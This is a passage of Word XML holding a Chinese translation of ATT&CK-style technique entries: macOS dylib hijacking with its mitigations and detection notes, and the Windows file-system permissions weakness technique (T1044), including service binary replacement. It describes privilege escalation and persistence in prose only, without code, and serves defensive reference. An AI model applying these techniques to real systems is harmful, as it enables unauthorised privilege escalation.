          <w:p w14:paraId="6A262460" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:lastRenderedPageBreak/>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve"> macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="544E762D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61188D7D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>有效权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>, root</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05F8D8E5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36A56C8F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004D0B91" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="283FBFA5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A7E759" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">macOS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OS X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统，可以通过常规方式查询目标动态库，再根据获取的搜索路径加载到程序中。攻击者可以利用二义性植入动态库，从而获取特权提升或持久性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346319F9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一种常见的方法是查看应用程序使用的动态库，然后在搜索路径的上一级目录安装同名的恶意代码。这通常会导致恶意代码与应用程序本身位于同一文件夹中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E83AB9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB0A80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>如果程序配置为以比当前用户更高的权限级别运行，那么当</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB0A80">
        <w:rPr>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dylib</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB0A80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>加载到应用程序中时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB0A80">
        <w:rPr>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dylib</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB0A80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>也将在该高级别运行。</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB0A80">
        <w:rPr>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB0A80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>这可以被攻击者用作权限提升技术。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6021C02B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D62038" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1617"/>
        <w:gridCol w:w="8119"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="4C246D38" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="427"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1617" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="769EBBB6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00BC3092" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="39434C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8119" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="42943E3C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00BC3092" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="39434C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00DB0A80" w14:paraId="3B6491F6" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1617" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C7EECFD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制文件和目录权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C56721D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>运行应用程序的文件夹和标准动态库文件夹中，设置目录访问控制以防止文件写入应用程序的搜索路径。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="31FFBD4B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1617" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C405287" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户账户管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AAAB572" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防止用户将文件写入应用程序的搜索路径。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B0DA8C8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1610E5E3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:t>Objective-See</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态库劫持扫描仪可用于检测动态库劫持的潜在案例。它可以监视文件系统中移动、重命名、替换或修改动态库，监测可疑的和已知的软件、补丁等不相关的进程加载中的动态库的集中更改（与过去的行为相比），并检查系统中是否有多个同名的动态库，以及监视历史上加载到进程中的版本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214FF827" w14:textId="0D644627" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>权限</w:t>
      </w:r>
      <w:r w:rsidR="00C226AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>缺陷</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="076AED17" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13EFBCF9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1044</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F3156E6" w14:textId="1D093D1D" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52DFA978" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69753A6E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="514F85FF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>有效权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，用户，管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72D46106" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:lastRenderedPageBreak/>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，服务，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="589B17C4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId53" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00671A0D">
                <w:t>CAPEC-17</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00671A0D">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50EBAC51" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Stefan Kanthak</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Travis Smith</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Tripwire</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C3E91C3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C163996" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BAC0C1A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动执行其功能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>涉及到的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特定二进制文件或执行其他操作。如果包含</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二进制</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>文件的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件系统目录的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或二进制文件本身的权限设置不正确，则目标二进制文件可能会被另一个使用用户级权限的二进制文件覆盖并由原始进程执行。如果原始进程和线程在更高的权限级别下运行，则替换的二进制文件也将在更高级别的权限下执行，这可能包括系统权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42592EC4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用此技术将合法二进制文件替换为恶意二进制文件，使用此手段在更高权限级别执行代码。如果配置执行进程在特定时间或在某个特定事件（例如，系统启动）期间运行，则该技术也可以用于获得持久性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7263EFA4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EED49A1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操纵</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务二进制文件是此技术的一种变体。攻击者可能会用自己的可执行文件替换合法的服务可执行文件，以获得持久性和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或将</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>权限升级到</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务执行账号级别（本地</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域账号，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LocalService</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NetworkService</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一旦服务启动，不管它</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接由用户启动（如果有适当访问权限）</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>还是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过某些其他方式来启动（例如随系统重启而</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>启动</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），则</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>运行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换的可执行文件，而不是原始服务可执行文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702EAAC8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
